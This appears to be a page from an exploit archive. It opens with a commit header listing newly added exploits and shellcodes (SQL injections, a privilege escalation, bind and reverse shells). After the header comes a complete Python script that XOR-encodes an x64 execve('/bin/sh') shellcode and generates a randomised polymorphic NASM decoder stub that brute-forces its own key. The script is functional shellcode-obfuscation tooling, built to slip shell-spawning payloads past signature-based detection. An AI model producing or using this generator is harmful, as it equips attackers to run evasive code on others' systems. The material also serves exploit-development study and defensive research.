d12dffd438
21 changes to exploits/shellcodes Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation Joomla! Component JEXTN Membership 3.1.0 - 'usr_plan' SQL Injection Event Manager 1.0 - SQL Injection Fancy Clone Script - 'search_browse_product' SQL Injection Real Estate Custom Script - 'route' SQL Injection Advance Loan Management System - 'id' SQL Injection IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting Joomla! Component JE PayperVideo 3.0.0 - 'usr_plan' SQL Injection Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection Joomla! Component JEXTN Classified 1.0.0 - 'sid' SQL Injection Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload Joomla! Component JMS Music 1.1.1 - SQL Injection Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal FiberHome AN5506 - Unauthenticated Remote DNS Change Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes) Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes) Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator) Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode
124 lines
No EOL
4.1 KiB
Python
Executable file
124 lines
No EOL
4.1 KiB
Python
Executable file
#!/usr/bin/python
|
|
from random import randint
|
|
|
|
encoded = ""
|
|
encoded2 = ""
|
|
|
|
bad_chars = [0x00]
|
|
|
|
shellcode = ("\x90" + "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x54\x5e\x57\x54\x5a\x0f\x05")
|
|
|
|
def valid(byte):
|
|
for ch in bad_chars:
|
|
if ch == byte:
|
|
return False
|
|
return True
|
|
|
|
valid_R = False
|
|
while not valid_R:
|
|
R = randint(0,2**8-1)
|
|
print
|
|
print "random generated number (key): 0x%02x" %R
|
|
valid_R = True
|
|
for x in bytearray(shellcode):
|
|
# XOR Encoding
|
|
y = x ^ R
|
|
if not valid(y):
|
|
valid_R = False
|
|
encoded = ""
|
|
encoded2 = ""
|
|
break
|
|
encoded += "\\x"
|
|
encoded += "%02x" %y
|
|
encoded2 += "0x"
|
|
encoded2 += "%02x," %y
|
|
encoded2 = encoded2[0:-1] # the [0:-1] is just to remove the "," at the end
|
|
print "Encoded shellcode ..."
|
|
print encoded
|
|
print encoded2
|
|
print
|
|
print "Len: %d" % len(bytearray(shellcode))
|
|
print
|
|
|
|
tab = " "
|
|
poly_db = { "pop rdi":
|
|
[tab+"pop rdi\n",
|
|
tab+"mov rdi,[rsp]\n"+tab+"add rsp,8\n"],
|
|
"push <param1>|pop <param2>":
|
|
[tab+"push <param1>\n"+tab+"pop <param2>\n",
|
|
tab+"mov <param2>,<param1>\n"],
|
|
"mov byte dl,[rdi]":
|
|
[tab+"mov byte dl,[rdi]\n",
|
|
tab+"mov r9,rdi\n"+tab+"mov byte dl,[r9]\n"],
|
|
"xor rdi,rdi":
|
|
[tab+"xor rdi,rdi\n",
|
|
tab+"sub rdi,rdi\n"],
|
|
"inc rdi":
|
|
[tab+"inc rdi\n",
|
|
tab+"dec rdi\n"+tab+"add rdi,2\n"],
|
|
"mov byte <param1>,byte <param2>":
|
|
[tab+"mov <param1>,<param2>\n",
|
|
tab+"mov r9b,<param2>\n"+tab+"mov <param1>,r9b\n"],
|
|
"xor al,dil":
|
|
[tab+"xor al,dil\n",
|
|
tab+"mov r9b,dil\n"+tab+"xor al,r9b\n"],
|
|
"cmp al,0x90":
|
|
[tab+"cmp al,0x90\n",
|
|
tab+"mov ah,0xff\n"+tab+"cmp ax,0xff90\n"],
|
|
"push <number>|pop <param2>":
|
|
[tab+"push <param1>\n"+tab+"pop <param2>\n",
|
|
tab+"xor <param2>,<param2>\n"+tab+"add <param2>,<param1>\n"],
|
|
"xor byte [rdi],al":
|
|
[tab+"xor byte [rdi],al\n",
|
|
tab+"mov byte r9b,[rdi]\n"+tab+"xor r9b,al\n"+tab+"mov byte [rdi],r9b\n"],
|
|
"loop decode":
|
|
[tab+"loop decode\n",
|
|
tab+"dec rcx\n"+tab+"xor r9,r9\n"+tab+"cmp r9,rcx\n"+tab+"jne decode\n"]
|
|
}
|
|
def poly(instruction,param1="",param2="",param3=""):
|
|
options = poly_db[instruction]
|
|
r = randint(0,len(options)-1)
|
|
str = options[r]
|
|
str = str.replace("<param1>",param1)
|
|
str = str.replace("<param2>",param2)
|
|
str = str.replace("<param3>",param3)
|
|
return str
|
|
|
|
code = "global _start \n"
|
|
code += "\n"
|
|
code += "section .text\n"
|
|
code += "\n"
|
|
code += "_start:\n"
|
|
code += " jmp short find_address\n"
|
|
code += "decoder:\n"
|
|
code += " ; Get the address of the string \n"
|
|
code += poly("pop rdi")
|
|
code += poly("push <param1>|pop <param2>","rdi","rbx")
|
|
code += "\n"
|
|
code += " ; get the first byte and bruteforce till you get the token 0x90\n"
|
|
|
|
code += poly("mov byte dl,[rdi]")
|
|
code += poly("xor rdi,rdi") # key that will be incremented from 0x00 to 0xff
|
|
code += "bruteforce:\n"
|
|
code += poly("inc rdi")
|
|
code += poly("mov byte <param1>,byte <param2>","al","dl")
|
|
code += poly("xor al,dil")
|
|
code += poly("cmp al,0x90")
|
|
code += " jne bruteforce\n"
|
|
code += "\n"
|
|
code += poly("push <number>|pop <param2>",str(len(bytearray(shellcode))),"rcx")
|
|
code += poly("mov byte <param1>,byte <param2>","al","dil")
|
|
code += poly("push <param1>|pop <param2>","rbx","rdi")
|
|
code += "decode:\n"
|
|
code += poly("xor byte [rdi],al")
|
|
code += poly("inc rdi")
|
|
code += poly("loop decode")
|
|
code += "\n"
|
|
code += " jmp rbx\n" # jmp to decoded shellcode
|
|
code += " \n"
|
|
code += "find_address:\n"
|
|
code += " call decoder\n"
|
|
code += " encoded db " + encoded2 + "\n"
|
|
|
|
fout = open("decoder.nasm","w")
|
|
fout.write(code) |